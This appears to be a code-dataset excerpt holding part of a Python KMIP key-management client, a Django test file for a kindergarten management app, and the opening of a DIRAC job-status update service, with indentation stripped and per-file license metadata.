attribute_names (list): A list of AttributeName values indicating
what object attributes the client wants from the server.
Optional, defaults to None.
Returns:
result (GetAttributesResult): A structure containing the results
of the operation.
"""
batch_item = self._build_get_attributes_batch_item(
uuid,
attribute_names
)
request = self._build_request_message(None, [batch_item])
response = self._send_and_receive_message(request)
results = self._process_batch_items(response)
return results[0]
def get_attribute_list(self, uid=None):
"""
Send a GetAttributeList request to the server.
Args:
uid (string): The ID of the managed object with which the retrieved
attribute names should be associated.
Returns:
result (GetAttributeListResult): A structure containing the results
of the operation.
"""
batch_item = self._build_get_attribute_list_batch_item(uid)
request = self._build_request_message(None, [batch_item])
response = self._send_and_receive_message(request)
results = self._process_batch_items(response)
return results[0]
def revoke(self, revocation_reason, uuid=None, revocation_message=None,
compromise_occurrence_date=None, credential=None):
return self._revoke(
unique_identifier=uuid,
revocation_reason=revocation_reason,
revocation_message=revocation_message,
compromise_occurrence_date=compromise_occurrence_date,
credential=credential)
def destroy(self, uuid=None, credential=None):
return self._destroy(unique_identifier=uuid,
credential=credential)
def register(self, object_type, template_attribute, secret,
credential=None):
return self._register(object_type=object_type,
template_attribute=template_attribute,
secret=secret,
credential=credential)
def rekey_key_pair(self, batch=False, private_key_uuid=None, offset=None,
common_template_attribute=None,
private_key_template_attribute=None,
public_key_template_attribute=None, credential=None):
batch_item = self._build_rekey_key_pair_batch_item(
private_key_uuid, offset, common_template_attribute,
private_key_template_attribute, public_key_template_attribute)
if batch:
self.batch_items.append(batch_item)
else:
request = self._build_request_message(credential, [batch_item])
response = self._send_and_receive_message(request)
results = self._process_batch_items(response)
return results[0]
def locate(self, maximum_items=None, storage_status_mask=None,
object_group_member=None, attributes=None, credential=None,
offset_items=None):
return self._locate(maximum_items=maximum_items,
storage_status_mask=storage_status_mask,
object_group_member=object_group_member,
attributes=attributes, credential=credential,
offset_items=offset_items)
def query(self, batch=False, query_functions=None, credential=None):
"""
Send a Query request to the server.
Args:
batch (boolean): A flag indicating if the operation should be sent
with a batch of additional operations. Defaults to False.
query_functions (list): A list of QueryFunction enumerations
indicating what information the client wants from the server.
Optional, defaults to None.
credential (Credential): A Credential object containing
authentication information for the server. Optional, defaults
to None.
"""
batch_item = self._build_query_batch_item(query_functions)
# TODO (peter-hamilton): Replace this with official client batch mode.
if batch:
self.batch_items.append(batch_item)
else:
request = self._build_request_message(credential, [batch_item])
response = self._send_and_receive_message(request)
results = self._process_batch_items(response)
return results[0]
def discover_versions(self, batch=False, protocol_versions=None,
credential=None):
batch_item = self._build_discover_versions_batch_item(
protocol_versions)
if batch:
self.batch_items.append(batch_item)
else:
request = self._build_request_message(credential, [batch_item])
response = self._send_and_receive_message(request)
results = self._process_batch_items(response)
return results[0]
def encrypt(self,
data,
unique_identifier=None,
cryptographic_parameters=None,
iv_counter_nonce=None,
credential=None):
"""
Encrypt data using the specified encryption key and parameters.
Args:
data (bytes): The bytes to encrypt. Required.
unique_identifier (string): The unique ID of the encryption key
to use. Optional, defaults to None.
cryptographic_parameters (CryptographicParameters): A structure
containing various cryptographic settings to be used for the
encryption. Optional, defaults to None.
iv_counter_nonce (bytes): The bytes to use for the IV/counter/
nonce, if needed by the encryption algorithm and/or cipher
mode. Optional, defaults to None.
credential (Credential): A credential object containing a set of
authorization parameters for the operation. Optional, defaults
to None.
Returns:
dict: The results of the encrypt operation, containing the
following key/value pairs:
Key | Value
--------------------|-----------------------------------------
'unique_identifier' | (string) The unique ID of the encryption
| key used to encrypt the data.
'data' | (bytes) The encrypted data.
'iv_counter_nonce' | (bytes) The IV/counter/nonce used for
| the encryption, if autogenerated.
'result_status' | (ResultStatus) An enumeration indicating
| the status of the operation result.
'result_reason' | (ResultReason) An enumeration providing
| context for the result status.
'result_message' | (string) A message providing additional
| context for the operation result.
"""
operation = Operation(OperationEnum.ENCRYPT)
request_payload = payloads.EncryptRequestPayload(
unique_identifier=unique_identifier,
data=data,
cryptographic_parameters=cryptographic_parameters,
iv_counter_nonce=iv_counter_nonce
)
batch_item = messages.RequestBatchItem(
operation=operation,
request_payload=request_payload
)
request = self._build_request_message(credential, [batch_item])
response = self._send_and_receive_message(request)
batch_item = response.batch_items[0]
payload = batch_item.response_payload
result = {}
if payload:
result['unique_identifier'] = payload.unique_identifier
result['data'] = payload.data
result['iv_counter_nonce'] = payload.iv_counter_nonce
result['result_status'] = batch_item.result_status.value
try:
result['result_reason'] = batch_item.result_reason.value
except Exception:
result['result_reason'] = batch_item.result_reason
try:
result['result_message'] = batch_item.result_message.value
except Exception:
result['result_message'] = batch_item.result_message
return result
def decrypt(self,
data,
unique_identifier=None,
cryptographic_parameters=None,
iv_counter_nonce=None,
credential=None):
"""
Decrypt data using the specified decryption key and parameters.
Args:
data (bytes): The bytes to decrypt. Required.
unique_identifier (string): The unique ID of the decryption key
to use. Optional, defaults to None.
cryptographic_parameters (CryptographicParameters): A structure
containing various cryptographic settings to be used for the
decryption. Optional, defaults to None.
iv_counter_nonce (bytes): The bytes to use for the IV/counter/
nonce, if needed by the decryption algorithm and/or cipher
mode. Optional, defaults to None.
credential (Credential): A credential object containing a set of
authorization parameters for the operation. Optional, defaults
to None.
Returns:
dict: The results of the decrypt operation, containing the
following key/value pairs:
Key | Value
--------------------|-----------------------------------------
'unique_identifier' | (string) The unique ID of the decryption
| key used to decrypt the data.
'data' | (bytes) The decrypted data.
'result_status' | (ResultStatus) An enumeration indicating
| the status of the operation result.
'result_reason' | (ResultReason) An enumeration providing
| context for the result status.
'result_message' | (string) A message providing additional
| context for the operation result.
"""
operation = Operation(OperationEnum.DECRYPT)
request_payload = payloads.DecryptRequestPayload(
unique_identifier=unique_identifier,
data=data,
cryptographic_parameters=cryptographic_parameters,
iv_counter_nonce=iv_counter_nonce
)
batch_item = messages.RequestBatchItem(
operation=operation,
request_payload=request_payload
)
request = self._build_request_message(credential, [batch_item])
response = self._send_and_receive_message(request)
batch_item = response.batch_items[0]
payload = batch_item.response_payload
result = {}
if payload:
result['unique_identifier'] = payload.unique_identifier
result['data'] = payload.data
result['result_status'] = batch_item.result_status.value
try:
result['result_reason'] = batch_item.result_reason.value
except Exception:
result['result_reason'] = batch_item.result_reason
try:
result['result_message'] = batch_item.result_message.value
except Exception:
result['result_message'] = batch_item.result_message
return result
def signature_verify(self,
message,
signature,
unique_identifier=None,
cryptographic_parameters=None,
credential=None):
"""
Verify a message signature using the specified signing key.
Args:
message (bytes): The bytes of the signed message. Required.
signature (bytes): The bytes of the message signature. Required.
unique_identifier (string): The unique ID of the signing key to
use. Optional, defaults to None.
cryptographic_parameters (CryptographicParameters): A structure
containing various cryptographic settings to be used for
signature verification. Optional, defaults to None.
credential (Credential): A credential object containing a set of
authorization parameters for the operation. Optional, defaults
to None.
Returns:
dict: The results of the signature verify operation, containing the
following key/value pairs:
Key | Value
---------------------|-----------------------------------------
'unique_identifier' | (string) The unique ID of the signing
| key used to verify the signature.
'validity_indicator' | (ValidityIndicator) An enumeration
| indicating the result of signature
| verification.
'result_status' | (ResultStatus) An enumeration indicating
| the status of the operation result.
'result_reason' | (ResultReason) An enumeration providing
| context for the result status.
'result_message' | (string) A message providing additional
| context for the operation result.
"""
operation = Operation(OperationEnum.SIGNATURE_VERIFY)
request_payload = payloads.SignatureVerifyRequestPayload(
unique_identifier=unique_identifier,
cryptographic_parameters=cryptographic_parameters,
data=message,
signature_data=signature
)
batch_item = messages.RequestBatchItem(
operation=operation,
request_payload=request_payload
)
request = self._build_request_message(credential, [batch_item])
response = self._send_and_receive_message(request)
batch_item = response.batch_items[0]
payload = batch_item.response_payload
result = {}
if payload:
result['unique_identifier'] = payload.unique_identifier
result['validity_indicator'] = payload.validity_indicator
result['result_status'] = batch_item.result_status.value
try:
result['result_reason'] = batch_item.result_reason.value
except Exception:
result['result_reason'] = batch_item.result_reason
try:
result['result_message'] = batch_item.result_message.value
except Exception:
result['result_message'] = batch_item.result_message
return result
def sign(self, data, unique_identifier=None,
cryptographic_parameters=None, credential=None):
"""
Sign specified data using a specified signing key.
Args:
data (bytes): Data to be signed. Required.
unique_identifier (string): The unique ID of the signing
key to be used. Optional, defaults to None.
cryptographic_parameters (CryptographicParameters): A structure
containing various cryptographic settings to be used for
creating the signature. Optional, defaults to None.
credential (Credential): A credential object containing a set of
authorization parameters for the operation. Optional, defaults
to None.
Returns:
dict: The results of the sign operation, containing the
following key/value pairs:
Key | Value
---------------------|-----------------------------------------
'unique_identifier' | (string) The unique ID of the signing
| key used to create the signature
'signature' | (bytes) The bytes of the signature
'result_status' | (ResultStatus) An enumeration indicating
| the status of the operation result
'result_reason' | (ResultReason) An enumeration providing
| context for the result status.
'result_message' | (string) A message providing additional
| context for the operation result.
"""
operation = Operation(OperationEnum.SIGN)
request_payload = payloads.SignRequestPayload(
unique_identifier=unique_identifier,
cryptographic_parameters=cryptographic_parameters,
data=data
)
batch_item = messages.RequestBatchItem(
operation=operation,
request_payload=request_payload
)
request = self._build_request_message(credential, [batch_item])
response = self._send_and_receive_message(request)
batch_item = response.batch_items[0]
payload = batch_item.response_payload
result = {}
if payload:
result['unique_identifier'] = payload.unique_identifier
result['signature'] = payload.signature_data
result['result_status'] = batch_item.result_status.value
try:
result['result_reason'] = batch_item.result_reason.value
except Exception:
result['result_reason'] = batch_item.result_reason
try:
result['result_message'] = batch_item.result_message.value
except Exception:
result['result_message'] = batch_item.result_message
return result
def mac(self, data, unique_identifier=None,
cryptographic_parameters=None, credential=None):
return self._mac(
data=data,
unique_identifier=unique_identifier,
cryptographic_parameters=cryptographic_parameters,
credential=credential)
def _create(self,
object_type=None,
template_attribute=None,
credential=None):
operation = Operation(OperationEnum.CREATE)
if object_type is None:
raise ValueError('object_type cannot be None')
req_pl = payloads.CreateRequestPayload(
object_type=object_type,
template_attribute=template_attribute)
batch_item = messages.RequestBatchItem(operation=operation,
request_payload=req_pl)
message = self._build_request_message(credential, [batch_item])
self._send_message(message)
message = messages.ResponseMessage()
data = self._receive_message()
message.read(data, self.kmip_version)
batch_items = message.batch_items
batch_item = batch_items[0]
payload = batch_item.response_payload
if payload is None:
payload_unique_identifier = None
payload_template_attribute = None
payload_object_type = None
else:
payload_unique_identifier = payload.unique_identifier
payload_template_attribute = payload.template_attribute
payload_object_type = payload.object_type
result = CreateResult(batch_item.result_status,
batch_item.result_reason,
batch_item.result_message,
payload_object_type,
payload_unique_identifier,
payload_template_attribute)
return result
def _build_create_key_pair_batch_item(self, common_template_attribute=None,
private_key_template_attribute=None,
public_key_template_attribute=None):
operation = Operation(OperationEnum.CREATE_KEY_PAIR)
payload = payloads.CreateKeyPairRequestPayload(
common_template_attribute=common_template_attribute,
private_key_template_attribute=private_key_template_attribute,
public_key_template_attribute=public_key_template_attribute)
batch_item = messages.RequestBatchItem(
operation=operation, request_payload=payload)
return batch_item
def _build_rekey_key_pair_batch_item(self,
private_key_uuid=None, offset=None,
common_template_attribute=None,
private_key_template_attribute=None,
public_key_template_attribute=None):
operation = Operation(OperationEnum.REKEY_KEY_PAIR)
payload = payloads.RekeyKeyPairRequestPayload(
private_key_uuid, offset,
common_template_attribute=common_template_attribute,
private_key_template_attribute=private_key_template_attribute,
public_key_template_attribute=public_key_template_attribute)
batch_item = messages.RequestBatchItem(
operation=operation, request_payload=payload)
return batch_item
def _build_query_batch_item(self, query_functions=None):
operation = Operation(OperationEnum.QUERY)
payload = payloads.QueryRequestPayload(query_functions)
batch_item = messages.RequestBatchItem(
operation=operation, request_payload=payload)
return batch_item
def _build_get_attributes_batch_item(
self,
uuid=None,
attribute_names=None
):
operation = Operation(OperationEnum.GET_ATTRIBUTES)
payload = payloads.GetAttributesRequestPayload(
uuid,
attribute_names
)
batch_item = messages.RequestBatchItem(
operation=operation,
request_payload=payload
)
return batch_item
def _build_get_attribute_list_batch_item(self, uid=None):
operation = Operation(OperationEnum.GET_ATTRIBUTE_LIST)
payload = payloads.GetAttributeListRequestPayload(uid)
batch_item = messages.RequestBatchItem(
operation=operation, request_payload=payload)
return batch_item
def _build_discover_versions_batch_item(self, protocol_versions=None):
operation = Operation(OperationEnum.DISCOVER_VERSIONS)
payload = payloads.DiscoverVersionsRequestPayload(
protocol_versions)
batch_item = messages.RequestBatchItem(
operation=operation, request_payload=payload)
return batch_item
def _process_batch_items(self, response):
results = []
for batch_item in response.batch_items:
operation = None
if batch_item.operation is not None:
operation = batch_item.operation.value
processor = self._get_batch_item_processor(operation)
result = processor(batch_item)
results.append(result)
return results
def _get_batch_item_processor(self, operation):
if operation is None:
return self._process_response_error
elif operation == OperationEnum.CREATE_KEY_PAIR:
return self._process_create_key_pair_batch_item
elif operation == OperationEnum.GET_ATTRIBUTES:
return self._process_get_attributes_batch_item
elif operation == OperationEnum.GET_ATTRIBUTE_LIST:
return self._process_get_attribute_list_batch_item
elif operation == OperationEnum.REKEY_KEY_PAIR:
return self._process_rekey_key_pair_batch_item
elif operation == OperationEnum.QUERY:
return self._process_query_batch_item
elif operation == OperationEnum.DISCOVER_VERSIONS:
return self._process_discover_versions_batch_item
else:
raise ValueError("no processor for operation: {0}".format(
operation))
def _process_get_attributes_batch_item(self, batch_item):
payload = batch_item.response_payload
uuid = None
attributes = None
if payload:
uuid = payload.unique_identifier
attributes = payload.attributes
return GetAttributesResult(
batch_item.result_status,
batch_item.result_reason,
batch_item.result_message,
uuid,
attributes
)
def _process_get_attribute_list_batch_item(self, batch_item):
payload = batch_item.response_payload
uid = None
names = None
if payload:
uid = payload.unique_identifier
names = payload.attribute_names
return GetAttributeListResult(
batch_item.result_status,
batch_item.result_reason,
batch_item.result_message,
uid,
names)
def _process_key_pair_batch_item(self, batch_item, result):
payload = batch_item.response_payload
payload_private_key_uuid = None
payload_public_key_uuid = None
payload_private_key_template_attribute = None
payload_public_key_template_attribute = None
if payload is not None:
payload_private_key_uuid = payload.private_key_unique_identifier
payload_public_key_uuid = payload.public_key_unique_identifier
payload_private_key_template_attribute = \
payload.private_key_template_attribute
payload_public_key_template_attribute = \
payload.public_key_template_attribute
return result(batch_item.result_status, batch_item.result_reason,
batch_item.result_message, payload_private_key_uuid,
payload_public_key_uuid,
payload_private_key_template_attribute,
payload_public_key_template_attribute)
def _process_create_key_pair_batch_item(self, batch_item):
return self._process_key_pair_batch_item(
batch_item, CreateKeyPairResult)
def _process_rekey_key_pair_batch_item(self, batch_item):
return self._process_key_pair_batch_item(
batch_item, RekeyKeyPairResult)
def _process_query_batch_item(self, batch_item):
payload = batch_item.response_payload
operations = None
object_types = None
vendor_identification = None
server_information = None
application_namespaces = None
extension_information = None
if payload is not None:
operations = payload.operations
object_types = payload.object_types
vendor_identification = payload.vendor_identification
server_information = payload.server_information
application_namespaces = payload.application_namespaces
extension_information = payload.extension_information
return QueryResult(
batch_item.result_status,
batch_item.result_reason,
batch_item.result_message,
operations,
object_types,
vendor_identification,
server_information,
application_namespaces,
extension_information)
def _process_discover_versions_batch_item(self, batch_item):
payload = batch_item.response_payload
result = DiscoverVersionsResult(
batch_item.result_status, batch_item.result_reason,
batch_item.result_message, payload.protocol_versions)
return result
def _process_response_error(self, batch_item):
result = OperationResult(
batch_item.result_status, batch_item.result_reason,
batch_item.result_message)
return result
def _get(self,
unique_identifier=None,
key_format_type=None,
key_compression_type=None,
key_wrapping_specification=None,
credential=None):
operation = Operation(OperationEnum.GET)
if key_format_type is not None:
key_format_type = key_format_type.value
req_pl = payloads.GetRequestPayload(
unique_identifier=unique_identifier,
key_format_type=key_format_type,
key_compression_type=key_compression_type,
key_wrapping_specification=key_wrapping_specification
)
batch_item = messages.RequestBatchItem(operation=operation,
request_payload=req_pl)
message = self._build_request_message(credential, [batch_item])
self._send_message(message)
message = messages.ResponseMessage()
data = self._receive_message()
message.read(data, self.kmip_version)
batch_items = message.batch_items
batch_item = batch_items[0]
payload = batch_item.response_payload
if payload is None:
payload_unique_identifier = None
payload_object_type = None
payload_secret = None
else:
payload_unique_identifier = payload.unique_identifier
payload_object_type = payload.object_type
payload_secret = payload.secret
result = GetResult(batch_item.result_status,
batch_item.result_reason,
batch_item.result_message,
payload_object_type,
payload_unique_identifier,
payload_secret)
return result
def _activate(self, unique_identifier=None, credential=None):
operation = Operation(OperationEnum.ACTIVATE)
uuid = None
if unique_identifier is not None:
uuid = attr.UniqueIdentifier(unique_identifier)
payload = payloads.ActivateRequestPayload(unique_identifier=uuid)
batch_item = messages.RequestBatchItem(operation=operation,
request_payload=payload)
message = self._build_request_message(credential, [batch_item])
self._send_message(message)
message = messages.ResponseMessage()
data = self._receive_message()
message.read(data, self.kmip_version)
batch_items = message.batch_items
batch_item = batch_items[0]
payload = batch_item.response_payload
if payload is None:
payload_unique_identifier = None
else:
payload_unique_identifier = payload.unique_identifier
result = ActivateResult(batch_item.result_status,
batch_item.result_reason,
batch_item.result_message,
payload_unique_identifier)
return result
def _destroy(self,
unique_identifier=None,
credential=None):
operation = Operation(OperationEnum.DESTROY)
uuid = None
if unique_identifier is not None:
uuid = attr.UniqueIdentifier(unique_identifier)
payload = payloads.DestroyRequestPayload(unique_identifier=uuid)
batch_item = messages.RequestBatchItem(operation=operation,
request_payload=payload)
message = self._build_request_message(credential, [batch_item])
self._send_message(message)
message = messages.ResponseMessage()
data = self._receive_message()
message.read(data, self.kmip_version)
batch_items = message.batch_items
batch_item = batch_items[0]
payload = batch_item.response_payload
if payload is None:
payload_unique_identifier = None
else:
payload_unique_identifier = payload.unique_identifier
result = DestroyResult(batch_item.result_status,
batch_item.result_reason,
batch_item.result_message,
payload_unique_identifier)
return result
def _revoke(self, unique_identifier=None, revocation_reason=None,
revocation_message=None, compromise_occurrence_date=None,
credential=None):
operation = Operation(OperationEnum.REVOKE)
reason = objects.RevocationReason(code=revocation_reason,
message=revocation_message)
uuid = None
if unique_identifier is not None:
uuid = attr.UniqueIdentifier(unique_identifier)
payload = payloads.RevokeRequestPayload(
unique_identifier=uuid,
revocation_reason=reason,
compromise_occurrence_date=compromise_occurrence_date)
batch_item = messages.RequestBatchItem(operation=operation,
request_payload=payload)
message = self._build_request_message(credential, [batch_item])
self._send_message(message)
message = messages.ResponseMessage()
data = self._receive_message()
message.read(data, self.kmip_version)
batch_items = message.batch_items
batch_item = batch_items[0]
payload = batch_item.response_payload
if payload is None:
payload_unique_identifier = None
else:
payload_unique_identifier = payload.unique_identifier
result = RevokeResult(batch_item.result_status,
batch_item.result_reason,
batch_item.result_message,
payload_unique_identifier)
return result
def _register(self,
object_type=None,
template_attribute=None,
secret=None,
credential=None):
operation = Operation(OperationEnum.REGISTER)
if object_type is None:
raise ValueError('object_type cannot be None')
req_pl = payloads.RegisterRequestPayload(
object_type=object_type,
template_attribute=template_attribute,
managed_object=secret)
batch_item = messages.RequestBatchItem(operation=operation,
request_payload=req_pl)
message = self._build_request_message(credential, [batch_item])
self._send_message(message)
message = messages.ResponseMessage()
data = self._receive_message()
message.read(data, self.kmip_version)
batch_items = message.batch_items
batch_item = batch_items[0]
payload = batch_item.response_payload
if payload is None:
payload_unique_identifier = None
payload_template_attribute = None
else:
payload_unique_identifier = payload.unique_identifier
payload_template_attribute = payload.template_attribute
result = RegisterResult(batch_item.result_status,
batch_item.result_reason,
batch_item.result_message,
payload_unique_identifier,
payload_template_attribute)
return result
def _locate(self, maximum_items=None, storage_status_mask=None,
object_group_member=None, attributes=None, credential=None,
offset_items=None):
operation = Operation(OperationEnum.LOCATE)
payload = payloads.LocateRequestPayload(
maximum_items=maximum_items,
offset_items=offset_items,
storage_status_mask=storage_status_mask,
object_group_member=object_group_member,
attributes=attributes
)
batch_item = messages.RequestBatchItem(
operation=operation,
request_payload=payload
)
message = self._build_request_message(credential, [batch_item])
self._send_message(message)
message = messages.ResponseMessage()
data = self._receive_message()
message.read(data, self.kmip_version)
batch_items = message.batch_items
batch_item = batch_items[0]
payload = batch_item.response_payload
if payload is None:
uuids = None
else:
uuids = payload.unique_identifiers
result = LocateResult(batch_item.result_status,
batch_item.result_reason,
batch_item.result_message,
uuids)
return result
def _mac(self,
data,
unique_identifier=None,
cryptographic_parameters=None,
credential=None):
operation = Operation(OperationEnum.MAC)
req_pl = payloads.MACRequestPayload(
unique_identifier=attr.UniqueIdentifier(unique_identifier),
cryptographic_parameters=cryptographic_parameters,
data=objects.Data(data))
batch_item = messages.RequestBatchItem(operation=operation,
request_payload=req_pl)
message = self._build_request_message(credential, [batch_item])
self._send_message(message)
message = messages.ResponseMessage()
data = self._receive_message()
message.read(data, self.kmip_version)
batch_items = message.batch_items
batch_item = batch_items[0]
payload = batch_item.response_payload
if payload is None:
payload_unique_identifier = None
payload_mac_data = None
else:
payload_unique_identifier = payload.unique_identifier
payload_mac_data = payload.mac_data
result = MACResult(batch_item.result_status,
batch_item.result_reason,
batch_item.result_message,
payload_unique_identifier,
payload_mac_data)
return result
# TODO (peter-hamilton) Augment to handle device credentials
def _build_credential(self):
if (self.username is None) and (self.password is None):
return None
if self.username is None:
raise ValueError('cannot build credential, username is None')
if self.password is None:
raise ValueError('cannot build credential, password is None')
credential_type = CredentialType.USERNAME_AND_PASSWORD
credential_value = {'Username': self.username,
'Password': self.password}
credential = self.credential_factory.create_credential(
credential_type,
credential_value)
return credential
def _build_protocol_version(self):
if self.kmip_version == enums.KMIPVersion.KMIP_1_0:
return ProtocolVersion(1, 0)
elif self.kmip_version == enums.KMIPVersion.KMIP_1_1:
return ProtocolVersion(1, 1)
elif self.kmip_version == enums.KMIPVersion.KMIP_1_2:
return ProtocolVersion(1, 2)
elif self.kmip_version == enums.KMIPVersion.KMIP_1_3:
return ProtocolVersion(1, 3)
elif self.kmip_version == enums.KMIPVersion.KMIP_1_4:
return ProtocolVersion(1, 4)
else:
return ProtocolVersion(2, 0)
def _build_request_message(self, credential, batch_items):
protocol_version = self._build_protocol_version()
if credential is None:
credential = self._build_credential()
authentication = None
if credential is not None:
authentication = Authentication([credential])
batch_count = BatchCount(len(batch_items))
req_header = messages.RequestHeader(protocol_version=protocol_version,
authentication=authentication,
batch_count=batch_count)
return messages.RequestMessage(request_header=req_header,
batch_items=batch_items)
def _send_message(self, message):
stream = BytearrayStream()
message.write(stream, self.kmip_version)
self.protocol.write(stream.buffer)
def _receive_message(self):
return self.protocol.read()
def _send_and_receive_message(self, request):
self._send_message(request)
response = messages.ResponseMessage()
data = self._receive_message()
response.read(data, self.kmip_version)
return response
def _set_variables(self, host, port, keyfile, certfile,
cert_reqs, ssl_version, ca_certs,
do_handshake_on_connect, suppress_ragged_eofs,
username, password, timeout, config_file):
conf = ConfigHelper(config_file)
# TODO: set this to a host list
self.host_list_str = conf.get_valid_value(
host, self.config, 'host', conf.DEFAULT_HOST)
self.host_list = self._build_host_list(self.host_list_str)
self.host = self.host_list[0]
self.port = int(conf.get_valid_value(
port, self.config, 'port', conf.DEFAULT_PORT))
self.keyfile = conf.get_valid_value(
keyfile, self.config, 'keyfile', None)
self.certfile = conf.get_valid_value(
certfile, self.config, 'certfile', None)
self.cert_reqs = getattr(ssl, conf.get_valid_value(
cert_reqs, self.config, 'cert_reqs', 'CERT_REQUIRED'))
self.ssl_version = getattr(ssl, conf.get_valid_value(
ssl_version, self.config, 'ssl_version', conf.DEFAULT_SSL_VERSION))
self.ca_certs = conf.get_valid_value(
ca_certs, self.config, 'ca_certs', conf.DEFAULT_CA_CERTS)
if conf.get_valid_value(
do_handshake_on_connect, self.config,
'do_handshake_on_connect', 'True') == 'True':
self.do_handshake_on_connect = True
else:
self.do_handshake_on_connect = False
if conf.get_valid_value(
suppress_ragged_eofs, self.config,
'suppress_ragged_eofs', 'True') == 'True':
self.suppress_ragged_eofs = True
else:
self.suppress_ragged_eofs = False
self.username = conf.get_valid_value(
username, self.config, 'username', conf.DEFAULT_USERNAME)
self.password = conf.get_valid_value(
password, self.config, 'password', conf.DEFAULT_PASSWORD)
self.timeout = int(conf.get_valid_value(
timeout, self.config, 'timeout', conf.DEFAULT_TIMEOUT))
if self.timeout < 0:
self.logger.warning(
"Negative timeout value specified, "
"resetting to safe default of {0} seconds".format(
conf.DEFAULT_TIMEOUT))
self.timeout = conf.DEFAULT_TIMEOUT
def _build_host_list(self, host_list_str):
'''
This internal function takes the host string from the config file
and turns it into a list
:return: LIST host list
'''
host_list = []
if isinstance(host_list_str, str):
host_list = host_list_str.replace(' ', '').split(',')
else:
raise TypeError("Unrecognized variable type provided for host "
"list string. 'String' type expected but '" +
str(type(host_list_str)) + "' received")
return host_list
| apache-2.0 | -8,223,827,019,652,129,000 | 39.915058 | 79 | 0.583467 | false |
gatsinski/kindergarten-management-system | kindergarten_management_system/kms/contrib/kindergartens/tests.py | 1 | 1137 | from django.test import TestCase
from .models import Kindergarten, KindergartenType, City
CityData = {
'name': 'City name'
}
KindergartenTypeData = {
'name': 'Kindergarten type name'
}
KindergartenData = {
'name': 'Test Kindergarten Name',
'address': 'Test Kindergarten Address'
}
class ModelTests(TestCase):
def setUp(self):
self.city = City.objects.create(**CityData)
self.kindergarten_type = KindergartenType.objects.\
create(**KindergartenTypeData)
self.kindergarten = Kindergarten.objects.\
create(**KindergartenData,
city=self.city,
type=self.kindergarten_type)
def test_city_creation(self):
self.assertTrue(City.objects.filter(**CityData).exists())
self.assertEqual(self.city, City.objects.get(**CityData))
def test_kindergarten_type_creation(self):
filter = KindergartenType.objects.filter(**KindergartenTypeData)
self.assertTrue(filter.exists())
object = KindergartenType.objects.get(**KindergartenTypeData)
self.assertEqual(self.kindergarten_type, object)
| gpl-3.0 | 2,340,813,184,942,888,400 | 28.921053 | 72 | 0.670185 | false |
fstagni/DIRAC | WorkloadManagementSystem/Service/JobStateUpdateHandler.py | 1 | 13370 | """ JobStateUpdateHandler is the implementation of the Job State updating
service in the DISET framework
The following methods are available in the Service interface
setJobStatus()
"""
from __future__ import absolute_import
import six
from six.moves import range
__RCSID__ = "$Id$"
import time
from DIRAC import S_OK, S_ERROR
from DIRAC.Core.DISET.RequestHandler import RequestHandler
from DIRAC.Core.Utilities import Time
from DIRAC.ConfigurationSystem.Client.Helpers.Operations import Operations
from DIRAC.WorkloadManagementSystem.DB.JobDB import JobDB
from DIRAC.WorkloadManagementSystem.DB.ElasticJobDB import ElasticJobDB
from DIRAC.WorkloadManagementSystem.DB.JobLoggingDB import JobLoggingDB
# This is a global instance of the JobDB class
jobDB = False
logDB = False
elasticJobDB = False
JOB_FINAL_STATES = ['Done', 'Completed', 'Failed']
def initializeJobStateUpdateHandler(serviceInfo):
global jobDB
global logDB
jobDB = JobDB()
logDB = JobLoggingDB()
return S_OK()
class JobStateUpdateHandler(RequestHandler):
def initialize(self):
"""
Flags gESFlag and gMySQLFlag have bool values (True/False)
derived from dirac.cfg configuration file
Determines the switching of ElasticSearch and MySQL backends
"""
global elasticJobDB
useESForJobParametersFlag = Operations().getValue('/Services/JobMonitoring/useESForJobParametersFlag', False)
if useESForJobParametersFlag:
elasticJobDB = ElasticJobDB()
self.log.verbose("Using ElasticSearch for JobParameters")
return S_OK()
###########################################################################
types_updateJobFromStager = [[six.string_types, int], six.string_types]
def export_updateJobFromStager(self, jobID, status):
""" Simple call back method to be used by the stager. """
if status == 'Done':
jobStatus = 'Checking'
minorStatus = 'JobScheduling'
elif status == 'Failed':
jobStatus = 'Failed'
minorStatus = 'Staging input files failed'
else:
return S_ERROR("updateJobFromStager: %s status not known." % status)
infoStr = None
trials = 10
for i in range(trials):
result = jobDB.getJobAttributes(jobID, ['Status'])
if not result['OK']:
return result
if not result['Value']:
# if there is no matching Job it returns an empty dictionary
return S_OK('No Matching Job')
status = result['Value']['Status']
if status == 'Staging':
if i:
infoStr = "Found job in Staging after %d seconds" % i
break
time.sleep(1)
if status != 'Staging':
return S_OK('Job is not in Staging after %d seconds' % trials)
result = self.__setJobStatus(int(jobID), jobStatus, minorStatus, 'StagerSystem', None)
if not result['OK']:
if result['Message'].find('does not exist') != -1:
return S_OK()
if infoStr:
return S_OK(infoStr)
return result
###########################################################################
types_setJobStatus = [[six.string_types, int]]
def export_setJobStatus(self, jobID, status='', minorStatus='', source='Unknown', datetime=None):
""" Set the major and minor status for job specified by its JobId.
Set optionally the status date and source component which sends the
status information.
"""
return self.__setJobStatus(int(jobID), status, minorStatus, source, datetime)
###########################################################################
types_setJobsStatus = [list]
def export_setJobsStatus(self, jobIDs, status='', minorStatus='', source='Unknown', datetime=None):
""" Set the major and minor status for job specified by its JobId.
Set optionally the status date and source component which sends the
status information.
"""
for jobID in jobIDs:
self.__setJobStatus(int(jobID), status, minorStatus, source, datetime)
return S_OK()
def __setJobStatus(self, jobID, status, minorStatus, source, datetime):
""" update the job status. """
result = jobDB.setJobStatus(jobID, status, minorStatus)
if not result['OK']:
return result
if status in JOB_FINAL_STATES:
result = jobDB.setEndExecTime(jobID)
if status == 'Running' and minorStatus == 'Application':
result = jobDB.setStartExecTime(jobID)
result = jobDB.getJobAttributes(jobID, ['Status', 'MinorStatus'])
if not result['OK']:
return result
if not result['Value']:
return S_ERROR('Job %d does not exist' % int(jobID))
status = result['Value']['Status']
minorStatus = result['Value']['MinorStatus']
if datetime:
result = logDB.addLoggingRecord(jobID, status, minorStatus, datetime, source)
else:
result = logDB.addLoggingRecord(jobID, status, minorStatus, source=source)
return result
###########################################################################
types_setJobStatusBulk = [[six.string_types, int], dict]
def export_setJobStatusBulk(self, jobID, statusDict):
""" Set various status fields for job specified by its JobId.
Set only the last status in the JobDB, updating all the status
logging information in the JobLoggingDB. The statusDict has datetime
as a key and status information dictionary as values
"""
status = ""
minor = ""
application = ""
appCounter = ""
endDate = ''
startDate = ''
startFlag = ''
jobID = int(jobID)
result = jobDB.getJobAttributes(jobID, ['Status'])
if not result['OK']:
return result
if not result['Value']:
# if there is no matching Job it returns an empty dictionary
return S_ERROR('No Matching Job')
new_status = result['Value']['Status']
if new_status == "Stalled":
